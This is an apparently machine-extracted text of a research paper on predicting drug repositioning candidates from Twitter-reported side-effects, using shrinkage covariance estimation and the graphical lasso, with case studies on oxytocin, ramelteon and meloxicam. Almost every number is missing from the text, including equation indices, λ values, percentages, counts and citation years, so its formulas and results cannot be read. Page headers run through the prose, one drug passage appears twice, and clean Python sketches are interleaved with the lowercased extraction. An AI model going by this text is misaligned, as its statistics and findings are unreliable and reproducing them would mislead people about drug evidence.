covariance of drug i with drug j: si,j = n− n k= (xki − x̄i)(xkj − x̄j) = n− n k= xkixkj − x̄ix̄j ( ) where x̄i = n n k= xki and xki is the k-th observation (side-effect) of variable (drug) xi. it can be shown than the average product of two binary variables is equal to their observed joint probabilities such that: n− n k= xkixkj = p(xj = |xi = ) ( ) where p(xj = |xi = ) refers to the conditional probability that variable xj equals one given that variable xi equals one. similarly, the product of the means of two binary variables is equal to the expected probability that both variables are equal to one, under the assumption of statistical independence: x̄ix̄j = p(xi = )p(xj = ). ( ) consequently, the covariance of two binary variables is equal to the difference between the observed joint probability and the expected joint probability: si,j = p(xj = |xi = )−p(xi = )p(xj = ). ( ) our objective is to find the precision or concentration matrix θ by inverting the sample covariance matrix s. using θ , we can obtain the matrix of partial correlation coefficients ρ for all pairs of variables as follows: ρi,j =− θi,j θi,iθj,j . ( ) the partial correlation between two variables x and y given a third, z, can be defined as the correlation between the residuals rx and ry after performing least-squares regression of x with z and y with z, respectively. this value, denotated ρx,y|z , provides a measure of the correlation between two variables when conditioned on the third, with a value of zero implying conditional independence if the input data distribution is multivariate gaussian. the partial correlation matrix ρ, however, gives the correlations between all pairs of variables conditioning on all other variables. 
off-diagonal elements in ρ that are significantly different from zero will therefore be indicative of pairs of drugs that show unique covariance between their side-effect profiles when taking into account (i.e., removing) the variance of side-effects profiles amongst all the other drugs. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. shrinkage estimation for the sample covariance matrix to be easily invertible, two desirable characteristics are that it should be positive definite, i.e., all eigenvalues should be distinct from zero, and well-conditioned, i.e., the ratio of its maximum and minimum singular value should not be too large. this can be particularly problematic when the sample size is small and the number of variables is large (n < p) and estimates of the covariance matrix become singular. to ensure these characteristics, and speed up convergence of the inversion, we condition the sample covariance matrix by shrinking towards an improved covariance estimator t, a process which tends to pull the most extreme coefficients towards more central values thereby systematically reducing estimation error (ledoit & wolf, ), using a linear shrinkage approach to combine the estimator and sample matrix in a weighted average: s′= αt +( −α)s ( ) where α ∈ { , } denotes the analytically determined shrinkage intensity. we apply the approach of schäfer and strimmer, which uses a distribution-free, diagonal, unequal variance model which shrinks off-diagonal elements to zero but leaves diagonal entries intact, i.e., it does not shrink the variances (schäfer & strimmer, ). shrinkage is actually applied to the correlations rather than the covariances, which has two distinct advantages: the off-diagonal elements determining the shrinkage intensity are all on the same scale, while the partial correlations derived from the resulting covariance estimator are independent of scale. graphical lasso for sparse inverse covariance estimation a useful output from the covariance matrix inversion is a sparse ρ matrix containing many zero elements, since, intuitively, we know that relatively few drug pairs will share a common mechanism of action, so removing any spurious correlations is desirable and results in a more parsimonious relationship model, while the non-zero elements will typically reflect the correct positive correlations in the true inverse covariance matrix more accurately (jones et al., ). however, elements of ρ are unlikely to be zero unless many elements of the sample covariance matrix are zero. the graphical lasso (friedman, hastie & tibshirani, ; banerjee, elghaoui & d’aspremont, ; hastie, tibshirani & wainwright, ) provides a way to induce zero partial correlations in ρ by penalizing the maximum likelihood estimate of the inverse covariance matrix using an ℓ -norm penalty function. the estimate can be found by maximizing the following log-likelihood using the block coordinate descent approach described by friedman, hastie & tibshirani ( ): logdetθ − tr(s′θ )−λ∥θ∥ . ( ) here, the first term is the gaussian log-likelihood of the data, tr denotes the trace operator and ∥θ∥ is the ℓ -norm—the sum of the absolute values of the elements of θ , weighted by the non-negative tuning paramater λ. the specific use of the ℓ -norm penalty has the nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
The specific use of the ℓ1-norm penalty has the desirable effect of setting elements in Θ to zero, resulting in a sparse matrix, while the parameter λ effectively controls the sparsity of the solution. This contrasts with the use of an ℓ2-norm penalty, which shrinks elements but never reduces them to zero. While this graphical lasso formulation is based on the assumption that the input data distribution is multivariate Gaussian, Banerjee, El Ghaoui & d'Aspremont ( ) showed that the dual optimization solution also applies to binary data, as is the case in our application. It has been noted that the graphical lasso produces an approximation of Θ that is not symmetric, so we update it as follows (Sustik & Calderhead, ):

\Theta \leftarrow \tfrac{1}{2}\left(\Theta + \Theta^{T}\right). \qquad (8)

The matrix ρ is then calculated according to Eq. (5), before repositioning predictions for drug i are determined by ranking all other drugs according to their absolute values in ρ_i and assigning their indications to drug i.

Results and discussion
Recovering known indications
To evaluate our method, we have attempted to predict repositioning targets for indications that are already known. If, by exploiting hindsight, we can recover these, then our method should provide a viable strategy with which to augment existing approaches that adopt an integrated approach to drug repositioning (Emig et al., ). Figure A shows the performance of the method at identifying co-indicated drugs at a range of λ values, resulting in different sparsity levels in the resulting ρ matrix. We measured the percentage at which a co-indicated drug was ranked amongst the top , , , and predictions for the target drug, respectively. Of the drugs in our data set, had a primary indication listed in Cortellis Clinical Trials Intelligence, with the majority of the remainder being made up of dietary supplements (e.g., methylsulfonylmethane) or plant extracts (e.g., Agaricus brasiliensis extract) which have no approved therapeutic effect. Rather than removing these from the data set, they were left in, as they may contribute to the partial correlation between pairs of drugs that do have approved indications. Results indicate that the method achieves its best performance with a λ value of − , where . % ( / ) of targets have a co-indicated drug returned amongst the top ranked predictions (Fig. A). This value compares favourably with both a strategy in which drug ranking is randomized ( . %, standard error ± . ) and another in which drugs are ranked according to the Jaccard index ( . %). In Ye, Liu & Wei ( ), a related approach is used to construct a repositioning network based on side-effects extracted from the SIDER database, Meyler's Side Effects of Drugs, Side Effects of Drugs Annual, and the Drugs@FDA database (Kuhn et al., ; Aronson, ; Ray, ; US Food and Drug Administration, ), also using the Jaccard index as the measure of drug-drug similarity. They report an equivalent value of . % of drugs having their indication correctly predicted amongst the top results. While data sets and underlying statistical models clearly differ, these results taken together suggest that the use of side-effect data mined from

Figure . Recovery of known indications. (a) Percentage at which a co-indicated drug is returned amongst the top , , , and ranked predictions for a given target, at different values of λ, the parameter that weights the ℓ1-norm penalty in the graphical lasso (Eq. (7)).
(b) sparsity of ρ matrix at different λ values, i.e., the number of non-zero elements in the upper triangle divided by (n −n)/ . social media can certainly offer comparable performance to methods using side-effect data extracted from more conventional resources, while the use of a global statistical model such as the graphical lasso does result in improved performance compared to a pairwise similarity coefficient such as the jaccard index. to further investigate the influence of the provenance of the data, we mapped our data set of drugs to chembl identifiers (gaulton et al., ; bento et al., ) which we then used to query sider for side-effects extracted from drug labels. this resulted in a reduced data set of drugs, in part due to the absence of many combination drugs from sider (e.g. the antidepressant symbyax which contains olanzapine and fluoxetine). using the same protocol described above, best performance of . % ( / ) was achieved with a slightly higher λ value of − . best performance on the same data set using side-effects derived from twitter was . % ( / ), again using a λ value of − , while the randomized strategy achieved . % (standard error ± . ), indicating that the use of higher quality side-effect data from sider allows the model to achieve better performance than is possible using twitter data. perhaps more interestingly, combining the correct predictions between the two datasources reveals that are unique to the twitter model, are unique to the sider model, with shared, supporting the use side-effect data mined from social media to augment conventional resources. we also investigated whether our results were biased by the over-representation of particular drug classes within our data set. using using cortellis clinical trials intelligence, we were able to identify the broad class for of the drugs ( . %) in our data set. the five largest classes were benzodiazepine receptor agonists ( / drugs returned amongst the top ranked predictions), analgesics ( / ), h -antihistamines ( / ), cyclooxygenase inhibitors ( / ), and anti-cancer ( / ). this indicates that the over-representation of h -antihistamines and cyclooxygenase inhibitors did result in a bias, and to a lesser extent analgesics, but that the overall effect of these five classes was more subtle ( / returned amongst the top ranked predictions, . %). nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the overall layout of the side-effect network. drugs are yellow, connecting edges are green. the layout is performed using a relative entropy optimization-based method (kovács, mizsei & csermely, ). in total, there are connected nodes, with each having an average of neighbours. painkillers such as paracetamol and ibuprofen have the highest number of connections ( and , respectively), which corresponds to them having the largest number of unique side-effects ( and ) reported on twitter. the strongest connection is between chondroitin and glucosamine (partial correlation coefficient (pcc) . ), both of which are dietary supplements used to treat osteoarthritis, closely followed by the antidepressant and anxiolytic agents phenelzine and tranylcypromine (pcc . ). the best performance of our approach at the top level is achieved when the resulting ρ matrix has a sparsity of . % (figs. 
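The comparisons reported above, in which the model ranking is scored against a randomized strategy and a Jaccard-index baseline by checking whether a co-indicated drug appears among the top-ranked predictions, can be reproduced with a few helper functions. Everything below, the side-effect profiles, the indications, and the choice of k, is toy data for illustration only; in the full method, the ranking comes from the absolute partial correlations rather than the Jaccard index.

```python
# Toy evaluation helpers: Jaccard-index baseline ranking and top-k recovery.
# Profiles and indications are invented for illustration.
def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if (a | b) else 0.0

def rank_by_jaccard(target, profiles):
    """Rank all other drugs by side-effect overlap with the target drug."""
    return sorted((d for d in profiles if d != target),
                  key=lambda d: jaccard(profiles[target], profiles[d]),
                  reverse=True)

def top_k_recovery(rankings, indications, k=10):
    """Fraction of targets with a co-indicated drug amongst their top-k ranked drugs."""
    hits = sum(
        any(indications.get(c) == indications.get(t) for c in ranked[:k])
        for t, ranked in rankings.items()
    )
    return hits / len(rankings)

profiles = {"drug_a": {"nausea", "headache", "dizziness"},
            "drug_b": {"nausea", "dizziness", "dry mouth"},
            "drug_c": {"rash", "itching"}}
indications = {"drug_a": "hypertension", "drug_b": "hypertension", "drug_c": "eczema"}

rankings = {d: rank_by_jaccard(d, profiles) for d in profiles}
print(rankings["drug_a"])                    # drug_b ranks above drug_c for drug_a
print(top_k_recovery(rankings, indications, k=1))
```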
b and ) which both justifies the use of the ℓ -norm penalized graphical lasso, and generates a graphical model with approximately a third of the parameters of a fully dense matrix, while the comparable performance at λ values between − and − also indicates a degree of robustness to the choice of this parameter. beyond the top ranked predictions, results are encouraging as the majority of targets ( . %) will have a co-indicated drug identified by considering only the top predictions, suggesting the method is a feasible strategy for prioritisation of repositioning candidates. predicting proposed indications of compounds currently in clinical trials while the previous section demonstrated our approach can effectively recover known indications, predictions after the fact are—while useful—best supported by more forward-looking evidence. in this section, we use clinical trial data to support our predictions where the ultimate success of our target drug is still unknown. using cortellis clinical trials intelligence, we extracted drugs present in our twitter data set that were currently undergoing clinical trials (ending after ) for a novel indication (i.e., for nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure recovery of proposed clinical trial indications. percentage at which a co-indicated drug is returned amongst the top , , , and ranked predictions for a given target, at different λ values. which they were not already indicated), resulting in a subset of drugs currently in trials for indications. figure shows the percentage at which a co-indicated drug was ranked amongst the top , , , and predictions for the target. similar to the recovery of known indications, best performance when considering the top ranked predictions was achieved with a λ value of − , resulting in . % ( / ) of targets having a co-indicated drug, which again compares well to a randomized strategy ( . %, standard error± . ) or a strategy using the jaccard index ( . %). recovery of proposed clinical trial indications is clearly more challenging than known indications, possibly reflecting the fact that a large proportion of drugs will fail during trials and therfore many of the proposed indications analysed here will in time prove false, although the general trend in performance as the sparsity parameter λ is adjusted tends to mirror the recovery of known indications. despite this, a number of interesting predictions with a diverse range of novel indications are made that are supported by exper- imental and clinical evidence; a selection of of the drugs where the trial indication was correctly predicted are presented in table . we further investigated three reposition- ing candidates with interesting pharmacology to understand their predicted results. oxytocin oxytocin is a nonapeptide hormone that acts primarily as a neuromodulator in the brain via the specific, high-affinity oxytocin receptor—a class i (rhodopsin-like) g-protein- coupled receptor (gpcr) (gimpl et al., ). currently, oxytocin is used for labor induction and the treatment of prader-willi syndrome, but there is compelling pre-clinical evidence to suggest that it may play a crucial role in the regulation of brain-mediated processes that are highly relevant to many neuropsychiatric disorders (feifel, ). nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
table: predicted indications for drugs currently in clinical trials. a selection of drugs which are currently in clinical trials for a new indication, and have a co-indicated drug ("evidence") ranked amongst the top predictions. "pcc" is the absolute partial correlation coefficient, "id" is the cortellis clinical trials intelligence identifier. average pcc scores for co-indicated drugs ranked amongst the top , , , and positions were . , . , . , . , and . , respectively.

drug | current indication | new indication | evidence | trial title
ramelteon | insomnia | bipolar i disorder | ziprasidone | ramelteon for the treatment of insomnia and mood stability in patients with euthymic bipolar disorder
denosumab | osteoporosis | breast cancer | capecitabine | pilot study to evaluate the impact of denosumab on disseminated tumor cells (dtc) in patients with early stage breast cancer
meloxicam | inflammation | non-hodgkin lymphoma | rituximab | a phase ii trial using meloxicam plus filgrastim in patients with multiple myeloma and non-hodgkins lymphoma
sulfasalazine | rheumatoid arthritis | diarrhea | loperamide | sulfasalazine in preventing acute diarrhea in patients with cancer who are undergoing pelvic radiation therapy
pyridostigmine | myasthenia gravis | cardiac failure | digitoxin | safety study of pyridostigmine in heart failure
alprazolam | anxiety disorder | epilepsy | clonazepam | staccato alprazolam and eeg photoparoxysmal response
oxytocin | prader-willi syndrome | schizophrenia | chlorpromazine | antipsychotic effects of oxytocin
interferon alfa | leukemia | thrombocythemia | hydroxyurea | pegylated interferon alfa- a salvage therapy in high-risk polycythemia vera (pv) or essential thrombocythemia (et)
etomidate | general anesthesia | depression | trazodone | comparison of effects of propofol and etomidate on rate pressure product and oxygen saturation in patients undergoing electroconvulsive therapy
guaifenesin | respiratory tract infections | rhinitis | ipratropium | the effect of oral guaifenesin on pediatric chronic rhinitis: a pilot study

oxytocin

oxytocin is a nonapeptide hormone that acts primarily as a neuromodulator in the brain via the specific, high-affinity oxytocin receptor, a class i (rhodopsin-like) g-protein-coupled receptor (gpcr) (gimpl et al., ). currently, oxytocin is used for labor induction and the treatment of prader-willi syndrome, but there is compelling pre-clinical evidence to suggest that it may play a crucial role in the regulation of brain-mediated processes that are highly relevant to many neuropsychiatric disorders (feifel, ). a number of animal studies have revealed that oxytocin has a positive effect as an antipsychotic (feifel & reza, ; lee et al., ), while human trials have revealed that intranasal oxytocin administered to highly symptomatic schizophrenia patients as an adjunct to their antipsychotic drugs improves positive and negative symptoms significantly more than placebo (feifel et al., ; pedersen et al., ). these therapeutic findings are supported by growing evidence of oxytocin's role in the manifestation of schizophrenia symptoms, such as a recent study linking higher plasma oxytocin levels with increased pro-social behavior in schizophrenia patients and with less severe psychopathology in female patients (rubin et al., ). the mechanisms underlying oxytocin's therapeutic effects on schizophrenia symptoms are poorly understood, but its ability to regulate mesolimbic dopamine pathways is thought to be responsible (feifel, ). here, our method predicts schizophrenia as a novel indication for oxytocin based on its proximity to chlorpromazine, which is currently used to treat schizophrenia (fig. ). chlorpromazine also modulates the dopamine pathway by acting as an antagonist of the dopamine receptor, another class i gpcr.
interestingly, the subgraph indicates that dopamine also has a high partial correlation coefficient with oxytocin, adding further support to the hypothesis that oxytocin, chlorpromazine and dopamine all act on the same pathway and therefore have similar side-effect profiles. side-effects shared by oxytocin and chlorpromazine include hallucinations, excessive salivation and anxiety, while shivering, weight gain, abdominal pain, nausea, and constipation are common side-effects also shared by other drugs within the subgraph. currently, larger scale clinical trials of intranasal oxytocin in schizophrenia are underway. if the early positive results hold up, it may signal the beginning of a new era in the treatment of schizophrenia, a field which has seen little progress in the development of novel efficacious treatments over recent years.

ramelteon

ramelteon, currently indicated for the treatment of insomnia, is predicted to be useful for the treatment of bipolar depression (fig. ). ramelteon is the first in a new class of sleep agents that selectively binds the mt and mt melatonin receptors in the suprachiasmatic nucleus, with high affinity over the mt receptor (owen, ). it is believed that the activity of ramelteon at mt and mt receptors contributes to its sleep-promoting properties, since these receptors are thought to play a crucial role in the maintenance of the circadian rhythm underlying the normal sleep-wake cycle upon binding of endogenous melatonin. abnormalities in circadian rhythms are prominent features of bipolar i disorder, with evidence suggesting that disrupted sleep-wake circadian rhythms are associated with an increased risk of relapse in bipolar disorder (jung et al., ). as bipolar patients tend to exhibit shorter and more variable circadian activity, it has been proposed that normalisation of the circadian rhythm pattern may improve sleep and consequently lead to a reduction in mood exacerbations. melatonin receptor agonists such as ramelteon may have a potential therapeutic effect in depression due to their ability to resynchronize the suprachiasmatic nucleus (wu et al., ). in fig. , evidence supporting the repositioning of ramelteon comes from ziprasidone, an atypical antipsychotic used to treat bipolar i disorder and schizophrenia (nicolson & nemeroff, ).

figure: predicted repositioning of oxytocin (red) for the treatment of schizophrenia based on its proximity to the schizophrenia drug chlorpromazine (grey). drugs in the graph are sized according to their degree (number of edges), while the thickness of a connecting edge is proportional to the partial correlation coefficient between the two drugs. the graph layout is performed by cytoscape (lopes et al., ), which applies a force-directed approach based on the partial correlation coefficient. nodes are arranged so that edges are of more or less equal length and there are as few edge crossings as possible. for clarity, only the top ten drugs ranked by partial correlation coefficient are shown.
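the neighbourhood subgraphs shown in these figures can be approximated with a few lines of networkx; the sketch below (hypothetical function and parameter names, and an arbitrary edge cutoff, not the published workflow) keeps the top ten neighbours of a query drug by absolute partial correlation and attaches the attributes used for drawing, after which the graph could be exported for layout in cytoscape.

```python
# illustrative sketch: extract the neighbourhood subgraph around a query drug.
import networkx as nx

def neighbourhood_subgraph(rho, names, query, top=10, cutoff=0.01):
    """rho: partial-correlation matrix; names: drug names in matching order; query: drug of interest."""
    g = nx.Graph()
    n = len(names)
    for i in range(n):
        for j in range(i + 1, n):
            if abs(rho[i, j]) >= cutoff:
                g.add_edge(names[i], names[j], weight=float(abs(rho[i, j])))
    ranked = sorted(g.neighbors(query), key=lambda x: g[query][x]["weight"], reverse=True)[:top]
    sub = g.subgraph([query] + ranked).copy()
    nx.set_node_attributes(sub, dict(sub.degree()), "size")   # node size ~ degree, as in the figures
    return sub

# e.g. nx.write_graphml(neighbourhood_subgraph(rho, names, "oxytocin"), "oxytocin_subgraph.graphml")
```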
ziprasidone is the second-ranked drug by partial correlation coefficient; a number of other drugs used to treat mood disorders can also be located in the immediate vicinity, including phenelzine, a non-selective and irreversible monoamine oxidase inhibitor (maoi) used as an antidepressant and anxiolytic, milnacipran, a serotonin–norepinephrine reuptake inhibitor used to treat major depressive disorder, and tranylcypromine, another maoi used as an antidepressant and anxiolytic agent. the co-location of these drugs in the same region of the graph suggests a degree of overlap in their respective mechanistic pathways, resulting in a high degree of similarity between their side-effect profiles. nodes in this subgraph also have a relatively large degree, indicating a tighter association than for other predictions, with common shared side-effects including dry mouth, sexual dysfunction, migraine, and orthostatic hypotension, while weight gain is shared between ramelteon and ziprasidone.

figure: predicted repositioning of ramelteon (red) for the treatment of bipolar i disorder based on its proximity to ziprasidone (grey). along with ziprasidone, phenelzine, milnacipran and tranylcypromine are all used to treat mood disorders.

meloxicam

meloxicam, a nonsteroidal anti-inflammatory drug (nsaid) used to treat arthritis, is predicted to be a repositioning candidate for the treatment of non-hodgkin lymphoma, via the mobilisation of autologous peripheral blood stem cells from bone marrow. by inhibiting cyclooxygenase , meloxicam is understood to inhibit generation of prostaglandin e , which is known to stimulate osteoblasts to release osteopontin, a protein which encourages bone resorption by osteoclasts (rainsford, ying & smith, ; ogino et al., ). by inhibiting prostaglandin e and disrupting the production of osteopontin, meloxicam may encourage the departure of stem cells, which otherwise would be anchored to the bone marrow by osteopontin (reinholt et al., ). in fig. , rituximab, a b-cell depleting monoclonal antibody that is currently indicated for treatment of non-hodgkin lymphoma, is the top ranked drug by partial correlation, which provides evidence for repositioning to this indication. interestingly, depletion of b-cells by rituximab has recently been demonstrated to result in decreased bone resorption in patients with rheumatoid arthritis, possibly via a direct effect on both osteoblasts and osteoclasts (wheater et al., ; boumans et al., ), suggesting a common mechanism of action between meloxicam and rituximab. further evidence is provided by the fifth-ranked drug clopidogrel, an antiplatelet agent used to inhibit blood clots in coronary artery disease, peripheral vascular disease, cerebrovascular disease, and to prevent myocardial infarction. clopidogrel works by irreversibly inhibiting the adenosine diphosphate receptor p y , which is known to increase osteoclast activity (bonekey watch, ). similarly to the ramelteon subgraph, many drugs in the vicinity of meloxicam are used to treat inflammation, including diclofenac, naproxen (both nsaids) and betamethasone, resulting in close association between these drugs, with shared side-effects in the subgraph including pain, cramping, flushing and fever, while swelling, indigestion, inflammation and skin rash are shared by meloxicam and rituximab.

figure: predicted repositioning of meloxicam (red) for the treatment of non-hodgkin lymphoma based on its proximity to rituximab (grey).

while the side-effects shared within the subgraphs of our three examples are commonly associated with a large number of drugs, some of the side-effects shared by the three drug pairs, such as hallucinations, excessive salivation and anxiety, are somewhat less common. to investigate this relationship for the data set as a whole, we calculated log frequencies for all side-effects and compared these values against the normalized average rank of pairs where the side-effect was shared by both the query and target drug. if we assume that a higher ranking in our model indicates a higher likelihood of drugs sharing a protein target, this relationship demonstrates similar properties to the observations of campillos et al. ( ), in that there is a negative correlation between the rank and frequency of a side-effect. the correlation coefficient has a value of − . , which is significantly different from zero at the . level, although the linear relationship appears to break down where the frequency of the side-effect is lower than about . .
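the frequency-versus-rank check described in the preceding paragraph could be implemented along the following lines (a sketch with assumed input structures, not the code used for the analysis): each side-effect's log frequency is compared with the normalised average rank of drug pairs that share it, and the correlation between the two quantities is computed.

```python
# illustrative sketch: correlate side-effect log frequency with normalised average rank.
import numpy as np
from scipy.stats import pearsonr

def frequency_vs_rank(side_effect_counts, shared_pair_ranks, n_drugs):
    """side_effect_counts: {side-effect: number of drugs reporting it};
    shared_pair_ranks: {side-effect: list of ranks (1 = most similar) at which drug pairs
    sharing that side-effect occur in the predictions}."""
    log_freq, mean_rank = [], []
    for se, ranks in shared_pair_ranks.items():
        if ranks and se in side_effect_counts:
            log_freq.append(np.log(side_effect_counts[se] / n_drugs))
            mean_rank.append(np.mean(ranks) / (n_drugs - 1))   # normalise ranks to [0, 1]
    return pearsonr(log_freq, mean_rank)                       # (correlation coefficient, p-value)
```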
conclusions

in this study, we have used side-effect data mined from social media to generate a sparse graphical model, with nodes in the resulting graph representing drugs, and edges between them representing the similarity of their side-effect profiles. we demonstrated that known indications can be inferred based on the indications of neighbouring drugs in the network, with . % of targets having their known indication identified amongst the top ranked predictions, while . % of drugs that are currently in a clinical trial have their proposed trial indication correctly identified. these results indicate that the volume and diversity of drug side-effects reported using social media is sufficient to be of use in side-effect-based drug repositioning, and this influence is likely to increase as the audience of platforms such as twitter continues to see rapid growth. it may also help to address the problem of side-effect under-reporting. we also demonstrate that global statistical models such as the graphical lasso are well-suited to the analysis of large multivariate systems such as drug–drug networks. they offer significant advantages over conventional pairwise similarity methods by incorporating indirect relationships between all variables, while the use of the lasso penalty allows a sparse, parsimonious model to be generated with fewer spurious connections, resulting in a simpler theory of relationships.

while our method shows encouraging results, it is more likely to play a role in drug repositioning as a component in an integrated approach. whether this is achieved by combining reported side-effects with those mined from resources such as sider, or by using predictions as the inputs to a supervised learning algorithm, a consensus approach is likely to achieve higher performance by incorporating a range of different data sources in addition to drug side-effects, while also compensating for the weaknesses of any single method (emig et al., ). limitations of our method largely stem from the underlying twitter data (plachouras, leidner & garrow, under review). only a small fraction of daily tweets contain reports of drug side-effects, therefore restricting the number of drugs we are able to analyse. however, given that systems such as somedoses are capable of continuously monitoring twitter, the numbers of drugs and reported side-effects should steadily accumulate over time. to address this further, it may be possible in the future to extend monitoring of social media to include additional platforms. for example, weibo is a chinese microblogging site akin to twitter, with over million users as of . clearly, tools will have to be adapted to deal with multilingual data processing or translation issues, while differences in cultural attitudes to sharing medical information may present further challenges. extensions to the statistical approach may also result in improved performance. methods such as the joint graphical lasso allow the generation of a graphical model using data with observations belonging to distinct classes (danaher, wang & witten, ). for example, two covariance matrices generated using data from twitter and sider could be combined in this way, resulting in a single model that best represents both sources. an extension to the graphical lasso also allows the decomposition of the sample covariance graph into smaller connected components via a thresholding approach (mazumder & hastie, ). this leads not only to large performance gains, but significantly increases the scalability of the graphical lasso approach.
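the covariance-thresholding extension cited above (mazumder & hastie) can be illustrated with a short sketch (ours, using sklearn's graphical_lasso; the covariance matrix s and penalty lam are assumed inputs): entries of |s| no larger than the penalty are zeroed, the surviving graph is split into connected components, and the graphical lasso is then solved independently, and much faster, on each block.

```python
# illustrative sketch of blockwise graphical lasso via exact covariance thresholding.
import numpy as np
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import connected_components
from sklearn.covariance import graphical_lasso

def blockwise_graphical_lasso(S, lam):
    """S: empirical covariance matrix; lam: lasso penalty. returns the assembled precision matrix."""
    adj = (np.abs(S) > lam).astype(int)
    np.fill_diagonal(adj, 0)
    n_comp, labels = connected_components(csr_matrix(adj), directed=False)
    precision = np.zeros_like(S, dtype=float)
    for c in range(n_comp):
        idx = np.where(labels == c)[0]
        if len(idx) == 1:                                   # isolated variable: no off-diagonal structure
            precision[idx[0], idx[0]] = 1.0 / S[idx[0], idx[0]]
            continue
        _, prec_block = graphical_lasso(S[np.ix_(idx, idx)], alpha=lam)
        precision[np.ix_(idx, idx)] = prec_block
    return precision
```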
another caveat to consider, common to many other repositioning strategies based on side-effect similarity, is that there is no evidence to suggest whether a repositioning candidate will be a better therapeutic than the drug from which the novel indication was inferred. while side-effects can provide useful information for inferring novel indications, they are in general undesirable and need to be balanced against any therapeutic benefits. our model does not attempt to quantify efficacy or side-effect severity, but it might be possible to modify the natural language processing step during twitter mining in order to capture comparative mentions of side-effects, since tweets discussing both the therapeutic effects and the side-effects of two related drugs are not uncommon. incorporating this information into our model may allow a more quantitative assessment of the trade-off between therapeutic effects and side-effects to be made as part of the prediction.

acknowledgements

the authors would like to thank lee lancashire for reading an early draft and andrew garrow for help with cortellis apis.

additional information and declarations

funding
this research was funded by thomson reuters global resources. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: thomson reuters global resources.

competing interests
all authors are employees of thomson reuters.

author contributions
• timothy nugent conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• vassilis plachouras and jochen l. leidner contributed reagents/materials/analysis tools, reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability:
the cortellis clinical trials intelligence ids are provided in table .

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references

allen mp. . covariance and linear independence. in: understanding regression analysis. new york: springer, – .
aronson jk. . meyer's side effects of drugs. th edition. amsterdam: elsevier.
backstrom m, mjorndal t, dahlqvist r. . under-reporting of serious adverse drug reactions in sweden. pharmacoepidemiology and drug safety ( ): – doi . /pds. .
banerjee o, el ghaoui l, d'aspremont a. . model selection through sparse maximum likelihood estimation for multivariate gaussian or binary data. the journal of machine learning research : – .
barabasi al, gulbahce n, loscalzo j. . network medicine: a network-based approach to human disease. nature reviews genetics ( ): – doi . /nrg .
bento a, gaulton a, hersey a, bellis lj, chambers j, davies m, krüger fa, light y, mak l, mcglinchey s, nowotka m, papadatos g, santos r, overington jp. . the chembl bioactivity database: an update. nucleic acids research (database issue):d –d doi . /nar/gkt .
bisgin h, liu z, kelly r, fang h, xu x, tong w. . investigating drug repositioning opportunities in fda drug labels through topic modeling. bmc bioinformatics (suppl ):s doi . / - - -s -s .
bonekey watch. . p ry and its role in osteoclast activity and bone remodeling. bonekey reports : doi . /bonekey. . .
boumans mjh, thurlings rm, yeo l, scheel-toellner d, vos k, gerlag dm, tak pp. . rituximab abrogates joint destruction in rheumatoid arthritis by inhibiting osteoclastogenesis. annals of the rheumatic diseases ( ): – doi . /annrheumdis- - .
buse jb, henry rr, han j, kim dd, fineman ms, baron ad. . effects of exenatide (exendin- ) on glycemic control over weeks in sulfonylurea-treated patients with type diabetes. diabetes care ( ): – doi . /diacare. . . .
campillos m, kuhn m, gavin ac, jensen lj, bork p. . drug target identification using side-effect similarity. science ( ): – doi . /science. .
chee bw, berlin r, schatz b. . predicting adverse drug events from personal health messages. amia annual symposium proceedings : – .
cheng f, li w, wu z, wang x, zhang c, li j, liu g, tang y. . prediction of polypharmacological profiles of drugs by the integration of chemical, side effect, and therapeutic space. journal of chemical information and modeling ( ): – doi . /ci x.
danaher p, wang p, witten dm. . the joint graphical lasso for inverse covariance estimation across multiple classes. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /rssb. .
dudley jt, sirota m, shenoy m, pai rk, roedder s, chiang ap, morgan aa, sarwal mm, pasricha pj, butte aj. . computational repositioning of the anticonvulsant topiramate for inflammatory bowel disease. science translational medicine ( ): ra doi . /scitranslmed. .
duran-frigola m, aloy p. . recycling side-effects into clinical markers for drug repositioning. genome medicine ( ): doi . /gm .
emig d, ivliev a, pustovalova o, lancashire l, bureeva s, nikolsky y, bessarabova m. . drug target prediction and repositioning using an integrated network-based approach. plos one ( ):e doi . /journal.pone. .
evans we, mcleod hl. . pharmacogenomics–drug disposition, drug targets, and side effects. new england journal of medicine ( ): – doi . /nejmra .
feifel d. . oxytocin as a potential therapeutic target for schizophrenia and other neuropsychiatric conditions. neuropsychopharmacology ( ): – doi . /npp. . .
feifel d, macdonald k, nguyen a, cobb p, warlan h, galangue b, minassian a, becker o, cooper j, perry w, lefebvre m, gonzales j, hadley a. . adjunctive intranasal oxytocin reduces symptoms in schizophrenia patients. biological psychiatry ( ): – doi . /j.biopsych. . . .
feifel d, reza t. . oxytocin modulates psychotomimetic-induced deficits in sensorimotor gating. psychopharmacology ( ): – doi . /s .
franke a, mcgovern dpb, barrett jc, wang k, radford-smith gl, ahmad t, lees cw, balschun t, lee j, roberts r, anderson ca, et al. . genome-wide meta-analysis increases to the number of confirmed crohn's disease susceptibility loci. nature genetics ( ): – doi . /ng. .
freifeld cc, brownstein js, menone cm, bao w, filice r, kass-hout t, dasgupta n. . digital drug safety surveillance: monitoring pharmaceutical products in twitter. drug safety ( ): – doi . /s - - -x.
friedman j, hastie t, tibshirani r. . sparse inverse covariance estimation with the graphical lasso. biostatistics ( ): – doi . /biostatistics/kxm .
gaulton a, bellis lj, bento ap, chambers j, davies m, hersey a, light y, mcglinchey s, michalovich d, al-lazikani b, overington jp. . chembl: a large-scale bioactivity database for drug discovery. nucleic acids research (database issue):d –d doi . /nar/gkr .
